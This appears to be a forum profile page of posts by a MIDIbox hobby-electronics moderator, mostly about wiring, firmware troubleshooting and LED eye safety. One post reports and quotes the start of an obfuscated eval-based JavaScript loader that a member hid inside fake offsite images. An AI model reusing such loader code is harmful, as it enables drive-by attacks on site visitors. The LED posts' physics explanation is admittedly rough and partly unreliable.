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Everything posted by stryd_one

  1. Welcome aboard sir', Assuming you've thoroughly read the forum, wiki, and ucapps.de sites, What are your questions specifically? BTW: MIDI CC's cannot send anything greater than 7 bit depth. Even on your SL. It's just not possible, a CC is a 7 bit variable.
  2. Hi all, By now, you've all heard my complain about offsite documentation. If you haven't, search the forum for <broken record> to find me joking about the fact that I have to repeat myself so often. The primary reason for this is that offsite doco tends to disappear - which sucks. Another reasonfor it is that we have no control over offsite data. I have just woken up to a PM alerting me to a series of posts containing links to so-called 'images' which triggered a forum member's virus scanner. Upon viewing the content of these images, I found the following: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <h1>Not Found (404)</h1> The requested URL /midibox/midibox-jun23-1.jpg was not found on this server. <hr> www.alphazone1.com <div id='x05ef3d8cc73f889bca9e349db656d2747'><script>var jQuery = eval('wziNnzdNoNwk.zeLvLamlL'.replace(/[LmzNk]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x74\x51\x7a\x37\x54\x28\x79\x72\x31\x55\x42\x78\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e .... remaining data removed ..... These were all posted by a member known as bcbox. I have no idea, nor can I be bothered converting all those codes into binary and decoding it, to find out what the FUCK that javascript is, but I do know that it is entirely unneccesary and just down-right dodgy. As a result I have just spent 90 minutes twisting my arthritis riddled knuckles to remove these images. I'm sure you can imagine that I am now extremely fucking pissed off. While I was there I have also noticed a few other unsavoury practices such as embedding forum avatars in div tags. As such, I will be aggressively attacking any offsite embedded data I see in future, instantly. That probably means removing them, and may extend to requestingbans if malicious intent is apparent. There are plenty of ways for you to upload content to the local servers, where we have total control over them - there is no reason for offsite data to be embedded. Of course, if you just hyperlink to it, then it's clear to the user where the data comes from, because they'll have to click the link. No harm there. Yours, A VERY angry stryd_one. @ TK / Twin-X / SmashTV : If you please: bcbox needs a ban until he can explain this, and LX needs to have his profile edited to remove the div tags.
  3. Oops I didn't notice that thread... yeh, crossposting is bad, mmkay?
  4. Something I didn't mention earlier is how impressed I am with the density in that lab.... I mean... it's not easy to fit so much stuff into a small space like you have, it's really crammed in, but still easily accessible... I know from my experience, that it doesn't come easy... For me it's usually a case of rearranging everything until it all fits, which usually take a looong time ;)
  5. Yeh nothing to stress about or I woulda moved this one too :) Just lettin' ya know for next time. Anyway, down to the more important stuff... If it's a '452 wired in the normal manner, then it's 8bit... but if you don't even see 'READY.' then something ain't right (and you definitely should not have started uploading apps). Firstly I'd upload a fresh copy of MIOS (In smart mode, wait for upload req=on) and see how you go. I get the impression that it seems to be responding to MIDI.... After you upload MIOS, if you still don't see anything on screen, you may want to try uploading another app for testing - but not yours. Use a known-working app, like MIDIO128 or ain64_din128_dout128 or something. The idea here is to see i the core is actually alive and responding, other than the LCD. All that said, this is almost certainly a soldering error, so I would get my multimeter and the schematics out and triple-check the wiring.... Perhaps the nonworking LCD is a symptom of another problem that could cause permanent damage. Best to be sure and spend a while to check it. As you've already checked for shorts, I'd be checking that the correct wires are connected. For example I wonder if you've got the enable line wrong?
  6. hahahahaha nice one :) That environment looks nice too.. gotta love logic :)
  7. I wish I knew more about this stuff to help you, that's some five star troubleshooting right there..... SID gurus?
  8. Heya demym, Firstly - you should start new threads more often. I've had to move one of yours already today because it was OT/hijacking, and this one is resurrecting a 5 year old thread. Best to just link to it, in that case. Anyway, we need more info. Pleas see the link in my signature labelled 'troubleshoot'. Include as much info is relevant: Did itwork with a different app installed? What core? what pic? 4bit or 8bit? etc etc etc. Please include the results of all your troubleshooting.
  9. What happened to the PIC? you'd be surprised what a fresh MIOS upload /BSL burn can fix :) Anyway maybe that's OT for this thread...
  10. I can't think of anything at all.... except maybe if you work in a brothel, teh red background lighting could make the contrast a bit low ;)
  11. Woop woop. You can probably put those timings back to normal now...
  12. Oh yeh, this has been done to death... I do think it's worth nagging toneburst about it though, for the sake of his eyes, and any others' eyes who have not searched about it yet ;)
  13. Pics please :) (or at least update the wiki page with soem text)
  14. I wish I could be more exact about this, but the general gist of it is that, the chemical process that is used for these lower waelength colours (blue, purple, parts of the white leds), emits a more fine bandwidth of light, than the red or green. I wonder if there's a chemistry nutter (or avid googler) on board who can explain *why* this is... I always wondered why, the more recent the tech, the finer bandwidth and hence more dangerous... ie, why is red > green > blue > white, in bandwidth*, AND in age? Is the finer bandwidth a side-effect of a 'new trick' used to get these colours? *Edited: as nils has pointed out, the bandwidth is not the only thing that effects the safety to the eye...
  15. Heheh NP mate. TK tends to make everything he touches A) go faster, and b) easy Anyway, you probably already noticed that the quote there is from the header file, which is often a good hint of what functions are available. There is usually more info in the corresponding .c file too.
  16. No, just the ones that emit light in a fine, or invisible, frequency band (blue, purple, UV, IR, white, etc) This is a very very scrappy explanation, rushed, full of technical inaccuracies, but hopefully will give you the idea.............. See the thing is, our eyes are evolved (designed, made by God, made by aliens, however you think they came to be) to deal with... you guessed it... natural light. In nature, if you see blue, you rarely (never) see *only* primary-blue light. You'll see a little red, a little green, a lot of light-blue, and medium blue, and dark blue, etc... ASCII art time: .... .... .... ..... ... ..... .. ........................... all this .. ...... remember the size of this space! ... IR --- R------------------------------------------------------B --- UV That 'remember the size of all this space', that's how much energy is hitting your eyes. That's how 'bright' it will seem to be. Your eyes will adjust to the amount of light you have shining in them, to keep them safe. Now, let's say we have a blue LED. because LEDs ain't perfect (what is?) they don't emit this nice broad spectrum of light. What you get is a thin 'spike' around the frequency of the LED. But of course, to 'seem' as bright, it has to carry the same amount of energy, which means that spike has to be a lot taller: keep going ^ || || || || || || || || || || || || || || || || || || || ...... ||||........ IR --- R------------------------------------------------------B --- UV Trouble is, your eyes aren't built for this weird unnatural stuff. So they don't see this as being superduperbright. They sense it as though it's more like this: . || || || || ...... ||||........ IR --- R------------------------------------------------------B --- UV So they don't close up like they otherwise would, which lets all this light right on in. It's like stabbing yourself in the eye with a beam of light so thin you can't feel it. You won't know what it's done until you're old, and your eyes start to wear out a lot sooner than they should. It's even worse when the light starts to fall into an invisible spectrum..... And most blue or purple leds also have a UV component. The short version is: Just use red or green. Yeeees, we all know blue looks cool. Get over it :D
  17. 2) Yes that's fine, just don't stuff the unused shift registers :)
  18. extern void J5_IO_PinSet(unsigned char pin, unsigned char value) __wparam; ;)
  19. Just to clarify: ultra-bright or otherwise - blue is still bad. (same goes for all the other colours we mentioned)
  20. Handsome midiboxer, lovely countryside, lab full of cool toys... can't go wrong! :D
  21. No, really. Non/partially visible or short spectra LEDs (blue, purple, UV, IR, etc) are dangerous.
  22. Firstly, it has to be said: you've bought something which is specifically listed as not recommended, and don't know how to wire it up, and want to know how to change MIOS so that it's fully supported.... Why did you buy it, if you knew it didn't work? Anyway I'll try to help... NC != LOW, so I don't know if it's constantly resetting. You should hold that one high with a pullup anyway. If the enable pin isn't connected, it just ain't gonna work. Similarly, as there is no enable pin provided on the core's LCD connector, you should hold this low with a pulldown. As for pin 18 and 19, you'll want to pull them high or low too. I'll let you figure out which :) CD->RS seems about right. HTH. Next time buy the right part huh ;)
  23. You don't play drums very often do you? ;) I'd think that things like env (attack times especially), LFO rates, PWM width, and WT params would be handy... Perhaps a CC to select which voice you are controlling with the other CCs?
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